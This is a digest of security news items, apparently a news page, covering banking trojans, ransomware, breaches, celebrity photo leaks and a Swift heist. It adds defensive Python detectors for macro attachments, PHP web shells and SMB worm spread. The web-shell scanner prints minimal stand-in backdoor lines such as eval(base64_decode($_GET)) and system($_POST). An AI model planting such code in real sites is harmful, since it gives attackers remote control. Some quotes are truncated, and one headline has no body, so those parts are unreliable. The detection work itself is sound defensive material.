What is CoreBot? Nefarious banking trojan resurfaces to target customers using malicious spam emails
Security researchers have discovered that the sophisticated banking trojan CoreBot is making a comeback, targeting online banking customers via phishing emails. Customers of several Canadian banking websites, including TD, Desjardins, RBC, Banque Nationale and Scotiabank, have been targeted with phishing emails carrying the new malicious payload, which is designed to steal their credentials, ZDNet reports. Researchers at Deep Instinct noticed a new, modified variant of the malware being distributed via malicious spam emails with Microsoft Office documents attached. "The documents contained VBA scripts which users were tricked to run, leading to the payload being downloaded and executed," Deep Instinct researchers Tal Leibovich and Shaul Vilkomir-Preisman said in a blog post on Wednesday (1 November), noting that the latest campaign seemed to have begun on Tuesday. The phishing email appears to thank the user for their "prompt payment" and contains a "View Invoice" link that, once clicked, initiates the download of the malicious payload. The researchers said initial analysis of the new CoreBot variant seemed to suggest that it is related to other active banking malware campaigns. The creators of the CoreBot malware also seem to have moved the command and control server to a different IP address since the last campaign. Tony Rowan, chief security consultant at SentinelOne, told SC Media UK that hackers often refurbish old malware code with new evasion techniques, a new C&C structure and more, rather than create new malicious software from scratch. "To make an old attack like CoreBot effective again, you simply have to make changes to the key indicators of compromise that would give it away," he said. "It's much easier and cheaper than building a new attack from the ground up."
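The delivery mechanism described above, a mailed Office document carrying a VBA project the user is tricked into running, is something a mail gateway can check for before the attachment ever reaches a user. The script below is an added example written for this page, not Deep Instinct's or the campaign's code. It relies on two facts about Office formats: OOXML packages (.docx/.docm/.xlsm and friends) are zip files that store macros in a part named vbaProject.bin and declare it in [Content_Types].xml, while legacy binary documents (.doc/.xls) are OLE compound files identified by an eight-byte signature. The sample documents it classifies are constructed in memory; the quarantine policy and function names are this example's own assumptions.

```python
"""Triage Office attachments for embedded VBA projects (added example).

Not code from Deep Instinct or the CoreBot campaign. Constructed sample
packages stand in for real attachments; no malware is involved.
"""
import io
import zipfile

# Signature of an OLE2 compound file (legacy .doc/.xls/.ppt containers).
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# Content type that OOXML uses to declare a VBA project part.
VBA_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"


def classify_attachment(data: bytes) -> str:
    """Return 'ooxml-macro', 'ooxml-clean', 'ole-legacy' or 'other'."""
    if data.startswith(OLE_MAGIC):
        # Legacy binary formats may carry macros in a 'Macros' storage.
        # Without an OLE parser we cannot prove they are clean, so they are
        # routed to sandbox/manual review rather than declared safe.
        return "ole-legacy"
    if not data.startswith(b"PK"):
        return "other"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            # The macro project lives in a part named vbaProject.bin
            # (word/, xl/ or ppt/ prefix depending on the application).
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                return "ooxml-macro"
            # Defence in depth: a renamed part is still declared by content type.
            if "[Content_Types].xml" in names and \
                    VBA_CONTENT_TYPE in zf.read("[Content_Types].xml"):
                return "ooxml-macro"
            return "ooxml-clean"
    except zipfile.BadZipFile:
        return "other"


def should_quarantine(filename: str, data: bytes) -> bool:
    """Hypothetical gateway policy (this example's assumption): hold any
    macro-bearing OOXML document and any legacy OLE container, regardless
    of the extension the sender chose for the file."""
    verdict = classify_attachment(data)
    return verdict in ("ooxml-macro", "ole-legacy")


def build_sample(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package used to exercise the classifier.
    It is not a real Word document and would not open in Office."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        ct = (b'<?xml version="1.0"?>'
              b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
              b'<Default Extension="xml" ContentType="application/xml"/>')
        if with_macro:
            ct += (b'<Override PartName="/word/vbaProject.bin" '
                   b'ContentType="application/vnd.ms-office.vbaProject"/>')
        ct += b"</Types>"
        zf.writestr("[Content_Types].xml", ct)
        zf.writestr("word/document.xml", b"<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00" * 64)  # placeholder bytes
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in (("invoice.docx", build_sample(True)),
                       ("invoice.docx", build_sample(False)),
                       ("invoice.doc", OLE_MAGIC + b"\x00" * 512)):
        print(name, classify_attachment(blob), "quarantine" if should_quarantine(name, blob) else "deliver")
```

The classifier deliberately ignores the file extension: a macro-enabled document renamed to .docx still contains vbaProject.bin, and a legacy .doc can carry macros with no visible marker at all, which is why the policy above treats the OLE case as "review", not "clean".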
Watch out for this fake version of WhatsApp found lurking on Google Play Store
A fake and potentially malicious application has been discovered on the official Google Play Store posing as WhatsApp Business, and has been downloaded up to 5,000 times. The existence of the dodgy software was first highlighted by the popular WhatsApp change-tracking website WABetaInfo, via Twitter user @MujtabaMHaq. The software posing as WhatsApp Business later changed its name to Update Whatsapp (sic) and has already attracted numerous user complaints revolving around pop-up ads. According to the app's Google Play page, if its permissions are granted it will be able to receive data from the internet, view network connections, have full network access, control vibration and prevent the device from sleeping. "Check only official channels to download WhatsApp Business in future. WhatsApp Business is not officially available yet for all," the WABetaInfo social media account tweeted to its 30,000 followers. Unfortunately for unwitting Android users, the Google Play Store was an official channel. At the time of writing, the software is still available for download. The genuine WhatsApp Business, according to the company, will enable users to "have a business presence on WhatsApp, communicate more efficiently with your customers, and help you grow your business". Users will be able to create business profiles and use messaging and call features to stay in closer contact with potential customers, ultimately extending the service's social network features.
Hackers leak WWE star Paige’s explicit photos and WhatsApp chat
Hackers have reportedly leaked explicit photos and selfies of the WWE star Paige, along with WhatsApp conversations with WWE wrestler Xavier Woods. For the second time in a year, private photos and WhatsApp conversations of the WWE diva have been leaked by unknown hackers. The British wrestler Saraya-Jade Bevis, who goes by the name Paige, was targeted by hackers earlier in March in what was dubbed "Fappening 2.0". In March, Paige confirmed that her phone had been hacked and private photos were stolen. She was among a whole host of high-profile celebrities, including A-listers such as Emma Watson, Amanda Seyfried, Mischa Barton and others, whose nude photos were published online. Private photos of WWE ring announcer JoJo have also reportedly been leaked by the same hackers, who have threatened to leak more content in the coming days, Hackread reported. It is still unclear whether the hackers behind the more recent leaks are part of the same cybercriminal group that leaked nude photos of numerous celebrities in 2014. The new leaks come soon after the third so-called "Celebgate" or "Fappening" hacker, Emilio Herrera, 32, was charged with hacking into over 550 celebrities' Gmail and iCloud accounts. Hollywood actresses including Jennifer Lawrence, Kirsten Dunst, Kate Upton, Kim Kardashian and others were among those affected by that hack.
Verticalscope hacked again: At least 2.7 million accounts compromised in second major data breach
In June 2016, Verticalscope admitted that it had suffered a data breach that saw at least 45 million user accounts compromised, their data having been leaked in a blog post on LeakedSource. Security researcher Alex Holden, founder of Hold Security, notified Brian Krebs last week that hackers were selling access to Verticalscope.com. Krebs reported that a simple search on one of Verticalscope's compromised domains led to a series of Pastebin posts that have since been deleted, "suggesting that the individual(s) responsible for this hack may be trying to use it to advertise a legally dicey new online service called LuiDB". "Similar to LeakedSource, LuiDB allows registered users to search for account details associated with any data element compromised in a breach, such as login, password, email, first/last name and Internet address," Krebs noted. That was before he contacted one of the hackers selling the data and was given screenshots indicating that "Verticalscope.com and several other properties were in fact compromised with a backdoor known as a 'Web shell'," Krebs wrote. The hackers reportedly obfuscated certain details in the screenshots, but what remained allowed him to locate at least two backdoors, on Verticalscope's website and on Toyotanation.com. "With a Web shell installed on a site, anyone can remotely administer the site, upload and delete content at will, or dump entire databases of information, such as usernames, passwords, email addresses and Internet addresses associated with each account," Krebs wrote. "The intrusion granted access to each individual website files," Verticalscope said in a statement to Krebs. IBTimes UK has reached out to Verticalscope for further details.
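Krebs' description of what a web shell lets an attacker do is also a description of what to hunt for: a PHP file that hands request parameters to eval or a shell function, often sitting somewhere PHP has no business being, such as an upload or image directory. The scanner below is an added example written for this page, not Krebs' tooling or anything Verticalscope uses. Its signatures are illustrative rather than a complete ruleset, and the forum file tree it scans is constructed inline; the paths and hypothetical shells in it are this example's own inventions, not the backdoors found on the real sites.

```python
"""Hunt for PHP web shells in a site tree (added example, not Krebs' or
Verticalscope's code). The file contents below are constructed for the
demonstration; the two 'shells' are minimal stand-ins, not real samples."""
import re

# Each rule names one behaviour typical of web shells. Illustrative, not exhaustive.
SHELL_RULES = {
    # eval() of an obfuscated blob: eval(base64_decode(...)), eval(gzinflate(...))
    "eval-of-decoded-payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # a command-execution function fed straight from request input
    "command-exec-of-request-input": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    # assert() used as an eval substitute on request input
    "assert-of-request-input": re.compile(
        r"\bassert\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    # preg_replace with the /e modifier evaluates the replacement as PHP code
    "preg_replace-e-modifier": re.compile(
        r"\bpreg_replace\s*\(\s*(['\"])/.*?/[a-z]*e[a-z]*\1", re.I),
    # a very long base64 literal is a common way to hide the real shell body
    "long-base64-blob": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}

# Directories that should only ever hold static content, never PHP.
UPLOAD_DIRS = ("/uploads/", "/images/", "/attachments/", "/avatars/")


def scan_php(path: str, source: str) -> list:
    """Return one finding per (line, rule) match plus a location finding
    when a PHP file sits in an upload or image directory."""
    findings = []
    if path.lower().endswith(".php") and any(d in path.lower() for d in UPLOAD_DIRS):
        findings.append({"path": path, "line": 0, "rule": "php-in-upload-dir"})
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, pattern in SHELL_RULES.items():
            if pattern.search(line):
                findings.append({"path": path, "line": lineno, "rule": rule})
    return findings


def scan_tree(files: dict) -> list:
    """files maps a relative path to its source text (in real use, read from disk)."""
    findings = []
    for path, source in files.items():
        findings.extend(scan_php(path, source))
    return findings


def suspicious_paths(files: dict) -> list:
    return sorted({f["path"] for f in scan_tree(files)})


# Constructed sample tree: a forum install with three planted backdoors and
# one legitimate file. None of this is content from the sites in the article.
SAMPLE_FILES = {
    "forum/includes/cache.php":
        "<?php\n$c = $_GET['c'];\n@eval(base64_decode($c));\n",
    "forum/images/uploads/.thumb.php":
        "<?php if (isset($_POST['x'])) { system($_POST['x']); }\n",
    "forum/plugins/legacy.php":
        "<?php\n$out = preg_replace(\"/.*/e\", $_POST['p'], \"\");\n",
    "forum/index.php":
        "<?php\nrequire 'config.php';\necho render_page($_GET['page'] ?? 'home');\n",
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']} {f['rule']}")
```

Signature matching like this finds the lazy shells; the ones that survive are usually the rest of the page's point, a hidden file in a directory no one looks at. That is why the location rule is worth keeping even when the content rules are quiet, and why a baseline of file hashes taken from a known-clean deploy catches what neither does.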
Dark Web hackers selling GIBON ransomware for $500
A new ransomware variant dubbed GIBON is now reportedly being sold by cybercriminals on the dark web for $500 (£380). The ransomware was uncovered last week and was reportedly found being actively distributed via a phishing campaign. GIBON functions like any other traditional ransomware, encrypting victims' data and demanding a ransom. An advert for the ransomware on the dark web allegedly claims that its encryption is impossible to undo. However, this is not true: a decryptor for GIBON is already available, Bleeping Computer has reported. Cybercriminals allegedly began selling GIBON in May, but apart from last week's campaign there appears to have been little activity, which may indicate that the ransomware has not been sold to many people. The ransomware may have ties to Russia, ZDNet reported. GIBON's logo is reportedly based on the logo of a Russian television firm, the instructions telling victims how to make ransom payments direct them to contact a number of Russian (mail.ru) email addresses, and Bleeping Computer reported that the advertisement for GIBON is also available in Russian alongside translated copies. All of this suggests that the ransomware's operators may be Russian. In the wake of the recent takedown of AlphaBay and Hansa, two of the largest and most prominent dark web markets, the underground cybercrime community appears to be in disarray. Some dark web administrators, in the Russian cybercrime community in particular, have previously expressed concerns over the increased attention the dark web now appears to get from law enforcement authorities. Last month, four major dark web markets including Dream Market and Tochka went mysteriously offline, sparking fears of a potential police crackdown.
Two banking Trojans that can plunder your accounts are on the rise, Microsoft warns
The use of two notorious strains of banking Trojan, Qakbot and Emotet, which are able to silently infect computers, steal login details and empty accounts, has spiked in recent months, Microsoft warns. According to a blog post published Monday (6 November), some of the new strains in use by hackers have worm-like capabilities that let them quickly spread across infected computer networks. Experts found that, like WannaCry, they could take advantage of a Windows protocol known as Server Message Block (SMB) to "drop copies" of the malware onto linked computers. "The threat to information is greater than ever," Microsoft warned, also showing statistics indicating that home internet users make up a large chunk of the target demographic for the culprits. [Chart: Qakbot and Emotet monthly machine encounters show an upward trend. Source: Microsoft.] Emotet was first identified as a major banking Trojan threat by security firm Trend Micro back in 2014. Cybersecurity expert Joie Salvio wrote at the time: "What makes this malware, detected as Emotet, highly notable is that it 'sniffs' network activity to steal information." Microsoft released a number of key tips so users can stay protected against the threat: cut off internet access or disconnect the affected computers from the network until they have been cleaned; remove unnecessary privileges, or disable privileged accounts that have been observed to spread malware using SMB; and update all security software on your computer system as soon as possible.
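Microsoft's advice to disable privileged accounts "that have been observed to spread malware using SMB" presupposes that someone is watching for the behaviour. What the worm-like spreading looks like in telemetry is one source host writing an executable into the ADMIN$ or C$ share of many machines in a short window, which Windows records on each target as Security event 5145 (detailed file share access) when object access auditing is enabled. The detector below is an added example for this page, not Microsoft's code or anything from the blog post; the event lines it consumes are constructed for illustration in a simplified key=value form, not a real log format, and the threshold and window are this example's own choices.

```python
"""Detect SMB admin-share fan-out, the footprint of a worm-like banking Trojan
copying itself over the network (added example, not Microsoft's code).

The event lines are constructed for illustration in a simplified key=value
form; a real deployment would read event 5145 from a SIEM or WEF collector."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.23 drops update.exe on four hosts in about a
# minute; 10.0.0.50 is an admin touching a single machine; the final line is a
# read of a non-administrative share and must not count.
SAMPLE_EVENTS = r"""
2017-11-06T09:12:01Z host=WS-01 id=5145 src=10.0.0.23 share=ADMIN$ target=update.exe mask=0x2
2017-11-06T09:12:09Z host=WS-02 id=5145 src=10.0.0.23 share=ADMIN$ target=update.exe mask=0x2
2017-11-06T09:12:40Z host=FS-01 id=5145 src=10.0.0.23 share=C$ target=Windows\Temp\update.exe mask=0x2
2017-11-06T09:13:15Z host=WS-03 id=5145 src=10.0.0.23 share=ADMIN$ target=update.exe mask=0x2
2017-11-06T09:14:02Z host=WS-07 id=5145 src=10.0.0.50 share=C$ target=Tools\psinfo.exe mask=0x2
2017-11-06T09:15:30Z host=WS-08 id=5145 src=10.0.0.50 share=ADMIN$ target=hotfix.exe mask=0x1
2017-11-06T09:20:00Z host=WS-09 id=5140 src=10.0.0.23 share=Public target=- mask=0x2
"""

ADMIN_SHARES = {"ADMIN$", "C$"}
WRITE_MASK = 0x2          # FILE_WRITE_DATA / FILE_ADD_FILE bit in the access mask
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".ps1", ".bat", ".vbs")


def parse_event(line: str) -> dict:
    """Parse one constructed 'timestamp key=value ...' line into a dict."""
    ts_text, *fields = line.split()
    ev = dict(f.split("=", 1) for f in fields)
    ev["ts"] = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")
    ev["mask"] = int(ev["mask"], 16)
    return ev


def load_events(text: str) -> list:
    return [parse_event(l) for l in text.strip().splitlines() if l.strip()]


def is_admin_share_write(ev: dict) -> bool:
    """True for a 5145 write of an executable into ADMIN$ or C$."""
    return bool(ev["id"] == "5145"
                and ev["share"] in ADMIN_SHARES
                and ev["mask"] & WRITE_MASK
                and ev["target"].lower().endswith(EXEC_SUFFIXES))


def detect_smb_fanout(events: list, threshold: int = 3,
                      window: timedelta = timedelta(minutes=10)) -> list:
    """Alert once per source address that writes executables to admin shares
    on at least `threshold` distinct hosts inside any `window`."""
    by_src = defaultdict(list)
    for ev in events:
        if is_admin_share_write(ev):
            by_src[ev["src"]].append(ev)

    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end, cur in enumerate(evs):
            # slide the window start forward so evs[start:end+1] fits in `window`
            while cur["ts"] - evs[start]["ts"] > window:
                start += 1
            hosts = {e["host"] for e in evs[start:end + 1]}
            if len(hosts) >= threshold:
                alerts.append({"src": src, "hosts": sorted(hosts),
                               "first": evs[start]["ts"], "last": cur["ts"]})
                break  # one alert per source; the SOC can pull the rest
    return alerts


if __name__ == "__main__":
    for a in detect_smb_fanout(load_events(SAMPLE_EVENTS)):
        print(f"{a['src']} wrote executables to {len(a['hosts'])} hosts "
              f"({', '.join(a['hosts'])}) between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

Two of the three tips map straight onto the alert: the source address identifies the machine to pull off the network, and the account in the real 5145 event (omitted from the constructed lines) is the one to disable. Legitimate software deployment will also trip a rule like this, so in practice the deployment servers go on an allow-list rather than the threshold going up.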
WWE Fappening leaks continue: Stolen nude snaps of divas JoJo and Maria Kanellis posted online
Sexual images of two more female WWE stars, Maria Kanellis and Joseann 'JoJo' Offerman, appear to have been leaked online, reportedly after being stolen by hackers. The website behind the "Fappening 2.0" leak of celebrity pictures earlier this year has claimed more WWE-focused disclosures are on the horizon. "These are just the preliminary Maria leaks," the website wrote under one of the latest entries, adding: "We will update this page as more become available." Kanellis was named in the previous batch of leaked nude images and has also been embroiled in sex tape rumours. "Personal and private photos of mine were stolen and unfortunately, they were shared publicly without my consent," Paige wrote on Twitter at the time of the earlier leak. This year there have been numerous leaks involving personal, often sexual, pictures of famous women, including Dakota Johnson, Emma Watson and Miley Cyrus. In recent years, a number of men have faced prosecution for hacking into the personal online accounts of Hollywood celebrities. Cybersecurity experts have warned that any images uploaded or stored online can be vulnerable to hackers. Mark James, a security expert at ESET, said: "Time and again we hear stories that someone's personal photos or intimate life has been leaked through a hack, data breach or password reuse. Not all are hacks, of course, some are simply having the right credentials to log in and gain access just like the owner, but every time it happens, people have to ask themselves: how private are our online accounts?"
Hackers steal $4.4m from Nepal bank in cyber-heist by abusing Swift network
Officials from NIC Asia Bank, based in Kathmandu, the capital city of Nepal, have been scrambling in recent weeks to recover from a hack on its computer networks, which abused the Swift financial messaging system to help steal approximately $4.4m. NIC Asia Bank, one of the largest private sector commercial institutions in the region, brought in experts from the country's central bank, Nepal Rastra Bank (NRB), and a probe was conducted by KPMG India. Pushkar Karki, a police chief at the Central Investigation Bureau (CIB), confirmed to local media that the payment order was placed by hacking the bank's own systems. "We have already requested the central banks in those countries to stop processing payments to the parties requested by the hackers," NRB spokesperson Rajendra Pandit said at the time. According to the Himalayan Times, six staff members who were responsible for handling the Swift terminal have been moved to other departments as the probe continues. Swift, or the Society for Worldwide Interbank Financial Telecommunication, is a global financial network used by more than 10,000 banks to send and receive cash transfers. "We subsequently share relevant information on an anonymised basis with the community." This is not the first time Swift has been exploited by hackers to steal large chunks of cash. In February 2016, hackers stole $81m from the Bangladesh central bank by using malware to infiltrate its network. Research suggests that North Korea increasingly uses cybercrime and computer hacking as a source of revenue, targeting casinos, banks and cash machines across the world.
UFC fans beware! The Fight Pass website may be secretly hijacking users’ PCs to mine Monero
Information & cyber ‘insecurity’ top risk in India for 2017
Pinkerton's India Risk Survey 2017 puts information and 'cyber insecurity' at the top of the list of risk ratings this year, ahead of terrorism risk, business espionage, intellectual property theft and accidents. India is undergoing a phase of 'information and cyber insecurity' as it moves towards asset digitisation and digital service delivery, the report says, and the increasing number of cyber attacks and incidents of cyber espionage require stronger investment in the security of cyber infrastructure. Although there are high costs associated with cybersecurity enhancement, the implications of weak security will be even higher, and information and cyber insecurity will remain the top business risk for a number of years. Information and cyber insecurity is not the top risk across all of India's sectors, however. "7 percent of cyber-related crime (under the IT Act)," the report says. "While the WannaCry ransomware was attempting to penetrate into the Indian cyber-domain, the country was put on highlight and official sources have declared that India was not as affected as reported. Several corporations, such as the Power Grid Corporation of India Limited (PGCIL), were ready to block the malware by setting up a precautionary firewall," the report says. The report suggests that training sessions can reduce human error, and that business and government cooperation can boost security.